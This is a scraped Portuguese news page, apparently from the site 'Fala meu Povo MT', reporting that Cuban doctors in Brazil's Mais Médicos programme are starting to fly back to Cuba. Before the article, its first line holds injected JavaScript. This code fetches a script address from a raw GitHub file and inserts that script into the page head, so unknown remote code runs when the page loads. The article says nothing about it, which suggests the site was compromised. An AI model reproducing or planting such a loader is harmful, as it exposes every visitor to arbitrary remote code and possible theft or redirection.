;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Fala meu Povo MT

Profissionais do Mais Médicos começam a embarcar para Cuba amanhã

© Alina Souza/Especial Palácio Piratini Profissional do Mais Médicos em atendimento: já estão confirmados cinco voos entre amanhã e sábado retornando ao país cubano

Profissionais cubanos que participavam do Mais Médicos começam a embarcar nos voos de volta para a ilha caribenha nesta quinta-feira, 22. De acordo com a Organização Pan-Americana de Saúde, já estão confirmados cinco voos entre amanhã e sábado. Conforme o jornal O Estado de S. Paulo adiantou, parte dos profissionais ontem mesmo já deixou de trabalhar.

Parte deles já começou a sair dos municípios em direção às cidades de onde os voos paraCuba deverão partir. A previsão é de que eles deixem o País até o dia 12 de dezembro. Atualmente, o País concentra 8.332 profissionais que iniciaram suas atividades no Mais Médicos a partir do recrutamento feito pela Organização Pan-Americana de Saúde.

Fonte: Portal MSN 

 

 

Sair da versão mobile